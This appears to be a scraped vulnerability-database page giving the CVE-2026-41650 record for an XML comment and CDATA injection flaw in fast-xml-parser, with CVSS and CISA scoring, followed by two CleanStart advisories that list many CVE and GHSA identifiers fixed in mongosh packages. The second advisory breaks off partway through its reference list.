Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-41650 (GCVE-0-2026-41650)
Vulnerability from cvelistv5 – Published: 2026-05-07 13:36 – Updated: 2026-05-07 15:08
VLAI
EPSS
Title
fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters
Summary
fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Prior to version 5.7.0, XMLBuilder does not escape the "-->" sequence in comment content or the "]]>" sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation. This issue has been patched in version 5.7.0.
Severity
6.1 (Medium)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-91 - XML Injection (aka Blind XPath Injection)
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/NaturalIntelligence/fast-xml-p… | x_refsource_CONFIRM |
| https://github.com/NaturalIntelligence/fast-xml-p… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| NaturalIntelligence | fast-xml-parser |
Affected:
< 5.7.0
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-41650",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-05-07T15:08:09.204375Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-05-07T15:08:36.208Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "fast-xml-parser",
"vendor": "NaturalIntelligence",
"versions": [
{
"status": "affected",
"version": "\u003c 5.7.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Prior to version 5.7.0, XMLBuilder does not escape the \"--\u003e\" sequence in comment content or the \"]]\u003e\" sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation. This issue has been patched in version 5.7.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-91",
"description": "CWE-91: XML Injection (aka Blind XPath Injection)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-07T13:36:55.871Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6"
},
{
"name": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.6.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.6.0"
}
],
"source": {
"advisory": "GHSA-gh4j-gqv2-49f6",
"discovery": "UNKNOWN"
},
"title": "fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-41650",
"datePublished": "2026-05-07T13:36:55.871Z",
"dateReserved": "2026-04-21T23:58:43.802Z",
"dateUpdated": "2026-05-07T15:08:36.208Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-41650",
"date": "2026-06-23",
"epss": "0.00238",
"percentile": "0.14627"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-41650\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-07T15:16:07.767\",\"lastModified\":\"2026-05-12T20:30:29.623\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Prior to version 5.7.0, XMLBuilder does not escape the \\\"--\u003e\\\" sequence in comment content or the \\\"]]\u003e\\\" sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation. This issue has been patched in version 5.7.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":6.1,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-91\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:naturalintelligence:fast-xml-parser:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"5.7.0\",\"matchCriteriaId\":\"182D0133-9479-411F-A055-EABFBBF62B78\"}]}]}],\"references\":[{\"url\":\"https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.6.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Product\",\"Release Notes\"]},{\"url\":\"https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-41650\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-07T15:08:09.204375Z\"}}}], \"references\": [{\"url\": \"https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-07T15:06:59.881Z\"}}], \"cna\": {\"title\": \"fast-xml-parser XMLBuilder: XML Comment and CDATA Injection via Unescaped Delimiters\", \"source\": {\"advisory\": \"GHSA-gh4j-gqv2-49f6\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 6.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"NaturalIntelligence\", \"product\": \"fast-xml-parser\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 5.7.0\"}]}], \"references\": [{\"url\": \"https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6\", \"name\": \"https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.6.0\", \"name\": \"https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.6.0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"fast-xml-parser allows users to process XML from JS object without C/C++ based libraries or callbacks. Prior to version 5.7.0, XMLBuilder does not escape the \\\"--\u003e\\\" sequence in comment content or the \\\"]]\u003e\\\" sequence in CDATA sections when building XML from JavaScript objects. This allows XML injection when user-controlled data flows into comments or CDATA elements, leading to XSS, SOAP injection, or data manipulation. This issue has been patched in version 5.7.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-91\", \"description\": \"CWE-91: XML Injection (aka Blind XPath Injection)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-07T13:36:55.871Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-41650\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-07T15:08:36.208Z\", \"dateReserved\": \"2026-04-21T23:58:43.802Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-07T13:36:55.871Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
cleanstart-2026-ad27625
Vulnerability from cleanstart
Published
2026-05-18 13:41
Modified
2026-05-06 06:31
Summary
Security fixes for CVE-2022-25881, CVE-2022-33987, CVE-2025-25285, CVE-2025-62718, CVE-2025-69873, CVE-2026-21637, CVE-2026-23745, CVE-2026-24842, CVE-2026-26960, CVE-2026-2950, CVE-2026-29786, CVE-2026-31802, CVE-2026-33036, CVE-2026-33349, CVE-2026-33750, CVE-2026-33916, CVE-2026-33937, CVE-2026-41650, CVE-2026-4800, CVE-2026-4923, CVE-2026-4926, ghsa-23c5-xmqv-rm74, ghsa-2qvq-rjwj-gvw9, ghsa-2w6w-674q-4c4q, ghsa-3mfm-83xf-c92r, ghsa-3p68-rc4w-qgx5, ghsa-3ppc-4f35-3m26, ghsa-3v7f-55p6-f55p, ghsa-442j-39wm-28r2, ghsa-48c2-rrv3-qjmp, ghsa-72xf-g2v4-qvf3, ghsa-7r86-cg39-jmmj, ghsa-7rx3-28cr-v5wh, ghsa-9cx6-37pm-9jff, ghsa-c2c7-rcm5-vvqj, ghsa-chqc-8p9q-pq6q, ghsa-f23m-r3pf-42rh, ghsa-f886-m6hf-6m8v, ghsa-gh4j-gqv2-49f6, ghsa-j3q9-mxjg-w52f, ghsa-pfrx-2q88-qq97, ghsa-r5fr-rjxr-66jc, ghsa-rc47-6667-2j5j, ghsa-rmvr-2pp2-xj38, ghsa-rp42-5vxx-qpwr, ghsa-w5hq-g745-h8pq, ghsa-xhpv-hc6g-r9c6, ghsa-xjpj-3mr7-gcpf applied in versions: 2.6.0-r1, 2.6.0-r2, 2.6.0-r3, 2.6.0-r4
Details
Multiple security vulnerabilities affect the mongosh package. These issues are resolved in later releases. See references for individual vulnerability details.
References
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "mongosh"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.6.0-r4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the mongosh package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-AD27625",
"modified": "2026-05-06T06:31:52Z",
"published": "2026-05-18T13:41:09.057005Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-AD27625.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2022-25881"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2022-33987"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-25285"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-62718"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-69873"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-21637"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-23745"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-24842"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-26960"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2950"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-29786"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-31802"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33036"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33349"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33750"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33916"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33937"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-41650"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-4800"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-4923"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-4926"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-23c5-xmqv-rm74"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2qvq-rjwj-gvw9"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2w6w-674q-4c4q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3mfm-83xf-c92r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3p68-rc4w-qgx5"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3ppc-4f35-3m26"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3v7f-55p6-f55p"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-442j-39wm-28r2"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-48c2-rrv3-qjmp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-72xf-g2v4-qvf3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7r86-cg39-jmmj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7rx3-28cr-v5wh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9cx6-37pm-9jff"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-c2c7-rcm5-vvqj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-chqc-8p9q-pq6q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f23m-r3pf-42rh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f886-m6hf-6m8v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-gh4j-gqv2-49f6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-j3q9-mxjg-w52f"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-pfrx-2q88-qq97"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-r5fr-rjxr-66jc"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-rc47-6667-2j5j"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-rmvr-2pp2-xj38"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-rp42-5vxx-qpwr"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-w5hq-g745-h8pq"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xhpv-hc6g-r9c6"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-xjpj-3mr7-gcpf"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25881"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-33987"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25285"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-21637"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23745"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24842"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26960"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2950"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29786"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-31802"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33036"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33349"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33750"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33916"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33937"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41650"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4800"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4923"
},
{
"type": "WEB",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4926"
}
],
"related": [],
"schema_version": "1.7.3",
"summary": "Security fixes for CVE-2022-25881, CVE-2022-33987, CVE-2025-25285, CVE-2025-62718, CVE-2025-69873, CVE-2026-21637, CVE-2026-23745, CVE-2026-24842, CVE-2026-26960, CVE-2026-2950, CVE-2026-29786, CVE-2026-31802, CVE-2026-33036, CVE-2026-33349, CVE-2026-33750, CVE-2026-33916, CVE-2026-33937, CVE-2026-41650, CVE-2026-4800, CVE-2026-4923, CVE-2026-4926, ghsa-23c5-xmqv-rm74, ghsa-2qvq-rjwj-gvw9, ghsa-2w6w-674q-4c4q, ghsa-3mfm-83xf-c92r, ghsa-3p68-rc4w-qgx5, ghsa-3ppc-4f35-3m26, ghsa-3v7f-55p6-f55p, ghsa-442j-39wm-28r2, ghsa-48c2-rrv3-qjmp, ghsa-72xf-g2v4-qvf3, ghsa-7r86-cg39-jmmj, ghsa-7rx3-28cr-v5wh, ghsa-9cx6-37pm-9jff, ghsa-c2c7-rcm5-vvqj, ghsa-chqc-8p9q-pq6q, ghsa-f23m-r3pf-42rh, ghsa-f886-m6hf-6m8v, ghsa-gh4j-gqv2-49f6, ghsa-j3q9-mxjg-w52f, ghsa-pfrx-2q88-qq97, ghsa-r5fr-rjxr-66jc, ghsa-rc47-6667-2j5j, ghsa-rmvr-2pp2-xj38, ghsa-rp42-5vxx-qpwr, ghsa-w5hq-g745-h8pq, ghsa-xhpv-hc6g-r9c6, ghsa-xjpj-3mr7-gcpf applied in versions: 2.6.0-r1, 2.6.0-r2, 2.6.0-r3, 2.6.0-r4",
"upstream": [
"CVE-2022-25881",
"CVE-2022-33987",
"CVE-2025-25285",
"CVE-2025-62718",
"CVE-2025-69873",
"CVE-2026-21637",
"CVE-2026-23745",
"CVE-2026-24842",
"CVE-2026-26960",
"CVE-2026-2950",
"CVE-2026-29786",
"CVE-2026-31802",
"CVE-2026-33036",
"CVE-2026-33349",
"CVE-2026-33750",
"CVE-2026-33916",
"CVE-2026-33937",
"CVE-2026-41650",
"CVE-2026-4800",
"CVE-2026-4923",
"CVE-2026-4926",
"ghsa-23c5-xmqv-rm74",
"ghsa-2qvq-rjwj-gvw9",
"ghsa-2w6w-674q-4c4q",
"ghsa-3mfm-83xf-c92r",
"ghsa-3p68-rc4w-qgx5",
"ghsa-3ppc-4f35-3m26",
"ghsa-3v7f-55p6-f55p",
"ghsa-442j-39wm-28r2",
"ghsa-48c2-rrv3-qjmp",
"ghsa-72xf-g2v4-qvf3",
"ghsa-7r86-cg39-jmmj",
"ghsa-7rx3-28cr-v5wh",
"ghsa-9cx6-37pm-9jff",
"ghsa-c2c7-rcm5-vvqj",
"ghsa-chqc-8p9q-pq6q",
"ghsa-f23m-r3pf-42rh",
"ghsa-f886-m6hf-6m8v",
"ghsa-gh4j-gqv2-49f6",
"ghsa-j3q9-mxjg-w52f",
"ghsa-pfrx-2q88-qq97",
"ghsa-r5fr-rjxr-66jc",
"ghsa-rc47-6667-2j5j",
"ghsa-rmvr-2pp2-xj38",
"ghsa-rp42-5vxx-qpwr",
"ghsa-w5hq-g745-h8pq",
"ghsa-xhpv-hc6g-r9c6",
"ghsa-xjpj-3mr7-gcpf"
]
}
cleanstart-2026-xr95601
Vulnerability from cleanstart
Published
2026-05-18 13:40
Modified
2026-05-06 08:56
Summary
Security fixes for CVE-2025-25285, CVE-2025-62718, CVE-2026-21637, CVE-2026-2950, CVE-2026-33750, CVE-2026-33916, CVE-2026-33937, CVE-2026-40175, CVE-2026-41650, CVE-2026-4800, CVE-2026-4923, CVE-2026-4926, ghsa-23c5-xmqv-rm74, ghsa-27v5-c462-wpq7, ghsa-2w6w-674q-4c4q, ghsa-34x7-hfp2-rc4v, ghsa-3mfm-83xf-c92r, ghsa-3p68-rc4w-qgx5, ghsa-3v7f-55p6-f55p, ghsa-48c2-rrv3-qjmp, ghsa-6v7q-wjvx-w8wg, ghsa-72xf-g2v4-qvf3, ghsa-7r86-cg39-jmmj, ghsa-83g3-92jg-28cx, ghsa-8gc5-j5rx-235r, ghsa-8qq5-rm4j-mr97, ghsa-9cx6-37pm-9jff, ghsa-9ppj-qmqm-q256, ghsa-c2c7-rcm5-vvqj, ghsa-chqc-8p9q-pq6q, ghsa-f23m-r3pf-42rh, ghsa-f886-m6hf-6m8v, ghsa-fj3w-jwp8-x2g3, ghsa-fjxv-7rqg-78g4, ghsa-fvcv-3m26-pcqx, ghsa-gh4j-gqv2-49f6, ghsa-j3q9-mxjg-w52f, ghsa-jp2q-39xq-3w4g, ghsa-mh29-5h37-fv8m, ghsa-pfrx-2q88-qq97, ghsa-qffp-2rhf-9h96, ghsa-r4q5-vmmm-2653, ghsa-r5fr-rjxr-66jc, ghsa-r6q2-hw4h-h46w, ghsa-rc47-6667-2j5j, ghsa-rmvr-2pp2-xj38, ghsa-rp42-5vxx-qpwr, ghsa-w5hq-g745-h8pq, ghsa-xhpv-hc6g-r9c6, ghsa-xjpj-3mr7-gcpf applied in versions: 2.6.0-r1, 2.7.0-r0, 2.8.1-r0, 2.8.2-r0, 2.8.2-r1, 2.8.2-r2, 2.8.2-r3
Details
Multiple security vulnerabilities affect the mongosh package. These issues are resolved in later releases. See references for individual vulnerability details.
References
| URL | Type | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"affected": [
{
"package": {
"ecosystem": "CleanStart",
"name": "mongosh"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.8.2-r3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"credits": [],
"database_specific": {},
"details": "Multiple security vulnerabilities affect the mongosh package. These issues are resolved in later releases. See references for individual vulnerability details.",
"id": "CLEANSTART-2026-XR95601",
"modified": "2026-05-06T08:56:09Z",
"published": "2026-05-18T13:40:13.239792Z",
"references": [
{
"type": "ADVISORY",
"url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-XR95601.json"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-25285"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2025-62718"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-21637"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-2950"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33750"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33916"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-33937"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-40175"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-41650"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-4800"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-4923"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/CVE-2026-4926"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-23c5-xmqv-rm74"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-27v5-c462-wpq7"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-2w6w-674q-4c4q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-34x7-hfp2-rc4v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3mfm-83xf-c92r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3p68-rc4w-qgx5"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-3v7f-55p6-f55p"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-48c2-rrv3-qjmp"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-6v7q-wjvx-w8wg"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-72xf-g2v4-qvf3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-7r86-cg39-jmmj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-83g3-92jg-28cx"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8gc5-j5rx-235r"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-8qq5-rm4j-mr97"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9cx6-37pm-9jff"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-9ppj-qmqm-q256"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-c2c7-rcm5-vvqj"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-chqc-8p9q-pq6q"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f23m-r3pf-42rh"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-f886-m6hf-6m8v"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-fj3w-jwp8-x2g3"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-fjxv-7rqg-78g4"
},
{
"type": "WEB",
"url": "https://osv.dev/vulnerability/ghsa-fvcv-3m26-pcqx"
},
{
"type": "WEB",
